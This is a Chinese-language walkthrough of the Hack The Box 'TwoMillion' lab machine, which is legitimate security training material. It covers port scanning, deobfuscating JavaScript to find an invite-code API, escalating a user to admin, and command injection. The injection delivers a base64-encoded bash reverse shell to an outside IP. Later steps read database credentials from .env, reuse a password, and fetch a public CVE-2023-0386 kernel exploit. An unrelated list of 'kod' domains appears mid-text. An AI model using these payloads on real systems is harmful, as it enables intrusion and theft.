HTB-TwoMillion 靶机笔记

TwoMillion 靶机笔记
概述
HTB 上的一台 liunx 靶机，难度定为了简单级别，它包括了对 js 接口的信息收集，js 反混淆，未授权，越权，命令注入等漏洞。

一、nmap 扫描
1）端口扫描
nmap -sT --min-rate 10000 -p- -o ports 10.10.11.221
Nmap scan report for 10.10.11.221
Host is up (0.37s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
2）详细信息
nmap -sT -sV -sC -p22,80 -O -o details 10.10.11.221
Nmap scan report for 10.10.11.221
Host is up (0.42s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3eea454bc5d16d6fe2d4d13b0a3da94f (ECDSA)
|_ 256 64cc75de4ae6a5b473eb3f1bcfb4e394 (ED25519)
80/tcp open http nginx
|_http-title: Did not follow redirect to http://2million.htb/
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 5.0 (97%), Linux 4.15 - 5.6 (95%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.3 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
看到 http-title: Did not follow redirect to http://2million.htb/，把 10.10.11.221 2million.htb 写到 /etc/hosts 里面

3）漏洞脚本
nmap --script=vuln -p22,80 -o vuln 10.10.11.221
Nmap scan report for 10.10.11.221
Host is up (1.1s latency).

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-passwd: ERROR: Script execution failed (use -d to debug)
|_http-vuln-cve2013-7091: ERROR: Script execution failed (use -d to debug)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
看到目标机器开启了 20,80 端口

二、web 渗透
image-20241007183358723

打开后发现有两个接口可以访问 join 和 login。

image-20241007183912115

注册需要邀请码，正常的网页邀请码，肯定是由网站用户访问对应的生成接口而生成的。那么我们可以找到对应的接口，看看能不能越权生成一个邀请码

F12 打开 js 代码，看到整个网站也就三个 js 文件

image-20241007184334509

而 inviteapi.min.js 这个名字也挺令我们感兴趣的。它的名字就是 “邀请的接口” ，但是它做了混淆，我们可以放到 js 反混淆的解析网站上，解析一下。

de4js：https://lelinhtinh.github.io/de4js/

image-20241007184709587

function verifyInviteCode(code) {
var formData = {
"code": code
};
$.ajax({
type: "POST",
dataType: "json",
data: formData,
url: '/api/v1/invite/verify',
success: function (response) {
console.log(response)
},
error: function (response) {
console.log(response)
}
})
}

function makeInviteCode() {
$.ajax({
type: "POST",
dataType: "json",
url: '/api/v1/invite/how/to/generate',
success: function (response) {
console.log(response)
},
error: function (response) {
console.log(response)
}
})
}
看到 verifyInviteCode 和 makeInviteCode 两个方法，他们都在方法里发送了 ajax 请求，我们可以用 curl 访问

curl -X POST http://2million.htb/api/v1/invite/generate
{"0":200,"success":1,"data":{"code":"MDgzSVMtVURIMEItVFpQM08tUVZNMVg=","format":"encoded"}}
对返回的结果作处理

curl -X POST http://2million.htb/api/v1/invite/generate | jq .data.code -r |base64 -d
4QXYT-HU98B-GKSER-OVB0B
使用邀请码注册用户，登陆

image-20241007185536322

image-20241007185608953

成功登陆

image-20241007185707543
把能点的按钮都点了点，这个 Access 还是值得我们关注的，请用 burp 抓包

image-20241007190107741

看到它的请求是 /api 开头的，我们可以访问 /api 看看有没有其他的接口暴露给我们

image-20241007190237360

根据返回信息，访问 /api/v1

image-20241007190332261

看到有 json 数据，burp 里不好看，我们用命令行工具处理一下

curl http://2million.htb/api/v1 -b "PHPSESSID=8n4cd4rml2gut2a75j88pef57s" | jq .
{
"v1": {
"user": {
"GET": {
"/api/v1": "Route List",
"/api/v1/invite/how/to/generate": "Instructions on invite code generation",
"/api/v1/invite/generate": "Generate invite code",
"/api/v1/invite/verify": "Verify invite code",
"/api/v1/user/auth": "Check if user is authenticated",
"/api/v1/user/vpn/generate": "Generate a new VPN configuration",
"/api/v1/user/vpn/regenerate": "Regenerate VPN configuration",
"/api/v1/user/vpn/download": "Download OVPN file"
},
"POST": {
"/api/v1/user/register": "Register a new user",
"/api/v1/user/login": "Login with existing user"
}
},
"admin": {
"GET": {
"/api/v1/admin/auth": "Check if user is admin"
},
"POST": {
"/api/v1/admin/vpn/generate": "Generate VPN for specific user"
},
"PUT": {
"/api/v1/admin/settings/update": "Update user settings"
}
}
}
}
看到有 admin 用户才能访问的接口，而且有一个修改数据的接口 /admin/settings/update，尝试把我们的普通用户越权修改为 admin

image-20241007190926241

添加头部 content-type:application/json

image-20241007191032984

添加参数 email:lingx5@test.com

image-20241007191138363

添加 is_admin:1

image-20241007191238932

成功实现越权修改，我们现在已经是 admin 权限了

可以访问 admin 用户才能访问的 /admin/vpn/generate 接口

curl -X POST http://2million.htb/api/v1/admin/vpn/generate -b "PHPSESSID=8n4cd4rml2gut2a75j88pef57s" -H 'content-type:application/json' -d '{"username":"lingx5"}'
根据提示一步步补齐参数，看到访问结果

[kod.pyjykj102.com）
[kod.001su.com）
[kod.003su.com）
[kod.weipujie.com）
[kod.whcn.net）
[kod.vscz.net）
[kod.w3c4.net）
尝试在 username 出命令注入

curl -X POST http://2million.htb/api/v1/admin/vpn/generate -b "PHPSESSID=8n4cd4rml2gut2a75j88pef57s" -H 'content-type:application/json' -d '{"username":"lingx5;whoami;"}'
www-data
执行成功了

三、获得立足点
echo 'bash -c "bash -i >& /dev/tcp/10.10.14.41/4444 0>&1"'|base64
curl -X POST http://2million.htb/api/v1/admin/vpn/generate -b "PHPSESSID=8n4cd4rml2gut2a75j88pef57s" -H 'content-type:application/json' -d '{"username":"lingx5;echo YmFzaCAtYyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC40MS80NDQ0IDA+JjEiCg==|base64 -d | bash;"}'
sudo rlwrap nc -lvnp 4444
image-20241007192634247

ls -liah
total 56K
67892 drwxr-xr-x 10 root root 4.0K Oct 7 11:20 .
67891 drwxr-xr-x 3 root root 4.0K Jun 6 2023 ..
262194 -rw-r--r-- 1 root root 87 Jun 2 2023 .env
79498 -rw-r--r-- 1 root root 1.3K Jun 2 2023 Database.php
79502 -rw-r--r-- 1 root root 2.8K Jun 2 2023 Router.php
83002 drwxr-xr-x 5 root root 4.0K Oct 7 11:20 VPN
79512 drwxr-xr-x 2 root root 4.0K Jun 6 2023 assets
79508 drwxr-xr-x 2 root root 4.0K Jun 6 2023 controllers
79492 drwxr-xr-x 5 root root 4.0K Jun 6 2023 css
79506 drwxr-xr-x 2 root root 4.0K Jun 6 2023 fonts
79494 drwxr-xr-x 2 root root 4.0K Jun 6 2023 images
262199 -rw-r--r-- 1 root root 2.7K Jun 2 2023 index.php
79496 drwxr-xr-x 3 root root 4.0K Jun 6 2023 js
79510 drwxr-xr-x 2 root root 4.0K Jun 6 2023 views
看到 .env 文件

cat .env
DB_HOST=127.0.0.1
DB_DATABASE=htb_prod
DB_USERNAME=admin
DB_PASSWORD=SuperDuperPass123
看到了一组数据库的凭证 admin:SuperDuperPass123，尝试口令复用

www-data@2million:~/html$ su - admin
su - admin
Password: SuperDuperPass123

id
uid=1000(admin) gid=1000(admin) groups=1000(admin)
whoami
admin
看到成功获得了 admin 的普通用户权限

四、提权到 root
查看属于 admin 用户的文件

find / -user admin -type f 2>/dev/null | grep -Ev "^/proc|^/run|^/sys"
/home/admin/.cache/motd.legal-displayed
/home/admin/.profile
/home/admin/.bash_logout
/home/admin/.bashrc
/var/mail/admin
看到有一封邮件

cat /var/mail/admin
From: ch4p ch4p@2million.htb
To: admin admin@2million.htb
Cc: g0blin g0blin@2million.htb
Subject: Urgent: Patch System OS
Date: Tue, 1 June 2023 10:45:22 -0700
Message-ID: 9876543210@2million.htb
X-Mailer: ThunderMail Pro 5.2

Hey admin,

I'm know you're working as fast as you can to do the DB migration. While we're partially down, can you also upgrade the OS on our web host? There have been a few serious Linux kernel CVEs already this year. That one in OverlayFS / FUSE looks nasty. We can't get popped by that.

HTB Godfather
提到了 OverlayFS，利用 google 快速了解一下

OverlayFS：https://securitylabs.datadoghq.com/articles/overlayfs-cve-2023-0386/

覆盖文件系统（通常缩写为 OverlayFS）允许用户将多个挂载点 "合并 " 为一个统一的文件系统。

它出现过权限提升的漏洞

exploit：https://github.com/xkaneiki/CVE-2023-0386/

git clone https://github.com/xkaneiki/CVE-2023-0386.git
开启 http 服务，上传到目标机器上

wget -r http://10.10.14.41/CVE-2023-0386
image-20241007195616280

看到提示符已经变成了 root

总结
通过 nmap 扫描发现目标机器就开放了 22,80 端口，打开 80 端口的 web 服务，在 js 里找到了生成邀请码的接口，通过邀请码注册用户，登陆平台。通过访问/api/v1 找到了接口，进行越权。拿到 admin 权限，访问生成 vpn 的接口，发现了存在命令注入的参数，成功获得了 www-data 的立足点

在文件里看到 .env 文件，里面有一组数据库的凭证信息 admin: SuperDuperPass123 通过口令服用，我们成功拿到了 admin 用户的 shell。通过查看邮件，发现了 OverlayFS 这个可能的提权路径，通过 CVE-2023-0386 完成提权